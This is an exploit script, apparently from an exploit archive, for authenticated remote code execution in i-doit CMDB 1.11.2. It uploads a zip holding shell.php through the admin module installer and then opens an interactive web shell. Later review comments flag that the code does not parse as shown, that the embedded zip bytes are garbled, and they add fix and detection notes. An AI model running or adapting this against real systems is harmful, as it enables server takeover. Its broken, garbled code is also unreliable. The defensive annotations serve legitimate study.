# Exploit Title: i-doit CMDB 1.11.2 - Remote Code Execution
# Date: 2018-12-05
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.i-doit.org/
# Software Link: https://www.i-doit.org/i-doit-open-1-11-2/
# Version: v1.11.2
# Category: Webapps
# Tested on: XAMPP for Linux 5.6.38-0
# Software Description : The IT-documentation solution i-doit is based on a
# complete open
# source configuration management and database. Using i-doit as a CMDB you
# can manage your IT according to ITIL best practices and configure the significant
# components of your IT environment.
# Description : This application has an upload feature that allows an
# authenticated user with administrator
# roles to upload arbitrary files to the main website directory.
# ==================================================================
# PoC: The exploit uploads a ".php" file inside a ".zip" file to achieve Remote Code Execution.
# i-doit accepts zip files as plugins and extracts them into the main
# directory. In order for the ".zip" file to be accepted by the application, it must
# contain a file named "package.json".

#!/usr/bin/python

import mechanize
import sys
import cookielib
import requests
import colorama
from colorama import Fore

# NOTE(review): Python 2 only (print statement, raw_input, cookielib);
# mechanize and colorama are third-party. The script has no meaningful
# indentation as listed, so the if/while bodies below do not parse as shown.
# Banner. `print` and the banner string sit on separate lines, so each pair
# prints an empty line and then evaluates the string as a no-op expression
# instead of printing it.
print
" ############################################################################"
print "# i-doit CMDB & ITSM 1.11.2 Remote Code Execution - Remote Code Execution #"
print "# Vulnerability discovered byvAkkuS #"
print "# My Blog - https://www.pentest.com.tr #"
print
"############################################################################ "
# Exactly one argument, the target host. `exit(0)` reports the usage error
# with a success status.
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <RHOST>"
exit(0)

rhost = sys.argv[1]

# User Information Input
# Credentials are read interactively; per the file header this requires an
# account with administrator rights (the module installer is an admin feature).
UserName = str(raw_input("User Name: "))
Password = str(raw_input("Password: "))

# Login into site
print(Fore.BLUE + "+ [*] Loging in...")
br = mechanize.Browser()
br.set_handle_robots(False)

# Cookie Jar
# The same jar is passed to requests later, so the session established by
# the mechanize login is reused for the upload.
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)

# Plain http; the first form on /admin/ is assumed to be the login form.
# The login result is never checked: the script proceeds whatever happened.
br.open("http://"+rhost+"/admin/")
assert br.viewing_html()
br.select_form(nr=0)
br.form['username'] = UserName
br.form['password'] = Password
br.submit()

title = br.title()
print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")

# Arbitrary ".php" File Upload Records with multipart/form-data to RCE
# Hand-built multipart body with a fixed boundary: fields "action"=add,
# "mandator"=0 and "module_file" carrying test.zip (application/zip), whose
# entries are package.json and shell.php (both names are visible in the
# archive bytes). As listed, the archive bytes are garbled (non-printable
# bytes rendered as plain text) and the header and body literals are broken
# across lines, so this section is not a valid Python literal as printed.
# Defender notes: the header describes the root cause as the module installer
# extracting archive contents into the web root; the fix is to validate
# archive entries against an allow-list and extract outside the document root,
# and to restrict module installation to the fewest possible accounts.
# Detection: an authenticated multipart POST to /admin/?req=modules&action=add
# carrying an application/zip part, followed by requests for a .php file that
# did not previously exist in the web root.
rce_headers = {"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data;
boundary=---------------------------13859713751632544601258659337"}
rce_data="-----------------------------13859713751632544601258659337 Content-Disposition:
form-data;
name="action" add -----------------------------13859713751632544601258659337 Content-Disposition:
form-data;
name="mandator" 0 -----------------------------13859713751632544601258659337 Content-Disposition:
form-data; name="module_file"; filename="test.zip" Content-Type:
application/zip PKx03x04x14x00x08x00x08x00x06x89x85Mx00x00x00x00x00x00x00x00x00x00x00x00x0cx00
x00package.jsonUT x00x07xccxdbx07\xccxdbx07\xccxdbx07\uxx0bx00x01x04x00x00x00x00x04x00x00x00x00x03x00PKx07x08x00x00x00x00x02x00x00x00x00x00x00x00PKx03x04x14x00x08x00x08x00Gx87{Mx00x00x00x00x00x00x00x00xdcx01x00x00 x00
x00shell.phpUT x00x07wMxfd[7x81x07\wMxfd[uxx0bx00x01x04x00x00x00x00x04x00x00x00x00x95x91xcbjxc30x10Exf7xfax8axc1x18,xd3xe6x0bxd2G6I)dx15xb2+ex10xf2xb8x16xd1#xxe4<x08xf9xf7:x8dxe3xb8Mxbbxe8JHxf7xcexbdgxd0xc3xf3xbaZx8b4Vx86xb14x96xe0x11x10gxafxf3)xe2XLxxcfx91x9cLtxe5Bx01xcdGx18mxe1xeaMxf2ox16x15c wxe6x87!xd5xc19xe5x8b68xc5x97xe9xf2-xd1xaeHxdexc7Bx98x12xa4xb6x8ax19ig8xb2xccx16TZxd2xd1x04?kxfcxd7x99xe59x1cx84x00x80xb4xecx9exda
O[xb8xf5xcaxecxccx92xb5xadxc3x81xd1x93xf1x9bxb0"yAiuqx04xb2L'x84x8bxadxa7xd0xcaZlx98j<Ixa8xeaZxedxafx1cxbfxa9}xf3=x9cxef}xd3xbfxaaxfe*x19xc4xdfxaexd0Mtxdf0xd0x8fxe2x13PKx07x08xc6=x06kxdex00x00x00xdcx01x00x00PKx01x02x14x03x14x00x08x00x08x00x06x89x85Mx00x00x00x00x02x00x00x00x00x00x00x00x0cx00
x00x00x00x00x00x00x00x00x00xa4x81x00x00x00x00package.jsonUT x00x07xccxdbx07\xccxdbx07\xccxdbx07\uxx0bx00x01x04x00x00x00x00x04x00x00x00x00PKx01x02x14x03x14x00x08x00x08x00Gx87{Mxc6=x06kxdex00x00x00xdcx01x00x00 x00
x00x00x00x00x00x00x00x00x00xa4x81\x00x00x00shell.phpUT x00x07wMxfd[7x81x07\wMxfd[uxx0bx00x01x04x00x00x00x00x04x00x00x00x00PKx05x06x00x00x00x00x02x00x02x00xb1x00x00x00x91x01x00x00x00x00 -----------------------------13859713751632544601258659337-- "

upload = requests.post("http://"+rhost+"/admin/?req=modules&action=add",
headers=rce_headers, cookies=cj, data=rce_data)
# Upload Control
# A 200 only means the admin page answered; it does not confirm that the
# archive was accepted or extracted (an error page is also a 200). The
# GET in the loop below is the only real check.
if upload.status_code == 200:
print (Fore.GREEN + "+ [*] Shell successfully uploaded!")

# Command Execute
# Re-fetches the dropped file before every prompt; each command is sent in
# the query string, so web-server access logs record the full command line.
# Detection: repeated GET /shell.php?cmd=... from a single client.
while True:
shellctrl = requests.get("http://"+rhost+"/shell.php")
if shellctrl.status_code == 200:
Command = str(raw_input(Fore.WHITE + "shell> "))
URL = requests.get("http://"+rhost+"/shell.php?cmd="+Command+"")
print URL.text
else:
# Any non-200 (including an unnoticed login failure upstream) ends here.
print (Fore.RED + "+ [X] Unable to upload or access the shell")
sys.exit()

# end